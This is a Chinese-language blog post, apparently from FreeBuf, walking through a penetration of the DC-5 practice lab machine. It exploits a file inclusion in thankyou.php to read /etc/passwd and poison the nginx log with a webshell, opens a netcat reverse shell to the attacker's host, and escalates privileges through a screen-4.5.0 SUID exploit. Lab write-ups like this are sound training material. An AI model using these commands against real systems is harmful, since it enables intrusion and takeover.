freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

DC系列靶机丨DC5
DC系列靶机丨DC5
小白学安全 2023-01-20 20:11:53 148537
所属地 四川省

信息收集

确定主机IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221216162311599


端口扫描

image-20221216162417725


nmap 扫描

image-20221216163110130


WEB测试

目录扫描

image-20221216163526527


网页观察

http://192.168.84.181/footer.php每次刷新都不一样,但是年份为2018、2017、2019、2020

image-20221216163647834

image-20221216163654972


http://192.168.84.181/thankyou.php,同样刷新该界面,年份也会发生变化,但是与footer.php页面相同

猜测有可能thankyou.php包含了页脚

其他页面的页脚都为2019,只有该页面才会随之变化,有可能调用了footer.php

尝试猜测

调用可能是通过file名称进行调用

image-20221216164243963

image-20221216164437596


传参值可能为file

服务器为Linux

image-20221216164529331

对file传参 file=/etc/passwd

读取到文件

image-20221216164606651


利用中间件日志写webshell

image-20221216165438543

当前中间件为nginx,nginx的日志默认路径为

nginx日志文件在路径 /var/log/nginx
日志开关在Nginx配置文件 /etc/nginx/nginx.conf


读取日志配置文件

image-20221216165903898


成功/失败日志记录位置

image-20221216170039605


把木马写入日志中,然后再配合文件包含 拿到shell

随便访问站点的某个网页,放入repeater模块

image-20221216170943192

image-20221216171101023



再次访问http://192.168.84.181/thankyou.php?file=/var/log/nginx/access.log

image-20221216171208074


蚁剑连接

url = http://192.168.84.181/thankyou.php?file=/var/log/nginx/access.log

密码 = 1

连接成功

image-20221216171345289


提权

反弹shell

蚁剑终端:nc -e /bin/bash 192.168.84.174 10086

image-20221216171716677


调用标准终端

python -c "import pty;pty.spawn('/bin/bash')"

image-20221216171846474


查看是否有可用的suid提权

find / -user root -perm -4000 -print 2>/dev/null

image-20221216172550083


观察到有一个screen-4.5.0

关于screen

image-20221216172755086

screen提权

1、搜索相关漏洞及下载poc到本地

image-20221216173108685


2、分析sh文件

image-20221216173319534


开启http服务,将三个文本使用wget下载到/tmp目录下

python -m http.server 10000


3、直接执行./dc5.sh,等待编译成功后查看用户权限

image-20221221183114559


image-20221221183153062

关注WX公众号:小白学安全,公众号内回复DC,即可获取DC系列靶机镜像!

# 渗透测试 # web安全 # 提权 # 漏洞分析 # 漏洞复现
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 小白学安全 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
Java堆栈溢出漏洞分析 金币
Java堆栈溢出漏洞分析

漏洞

Java的数据类型在执行过程中存储在两种不同形式的内存中:栈(stack)和堆(deap),由运行Java虚拟机(JVM)的底层平台维护。

1Thek2

445716围观  · 6收藏  · 5喜欢 2023-06-26

记一次市级攻防演练(已打码) 原创
记一次市级攻防演练(已打码)

Web安全

一次市级攻防演练复盘

Ordinaryzyx

248886围观  · 2收藏  · 44喜欢 2023-01-26

DC系列靶机丨DC9 原创
DC系列靶机丨DC9

Web安全

DC系列靶机之DC9

小白学安全

134796围观 2023-01-26

DC系列靶机丨DC8 原创
DC系列靶机丨DC8

Web安全

DC系列靶机之DC8

小白学安全

137438围观 2023-01-26

DC系列靶机丨DC7 原创
DC系列靶机丨DC7

Web安全

DC系列靶机之DC7

小白学安全

146558围观  · 1收藏 2023-01-26

小白学安全 LV.4
微信公众号关注【小白学安全】 一一一一 xbxaq.com
  • 9 文章数
  • 5 关注者
DC系列靶机丨DC9
2023-01-26
DC系列靶机丨DC8
2023-01-26
DC系列靶机丨DC7
2023-01-26
文章目录
信息收集
    WEB测试
      提权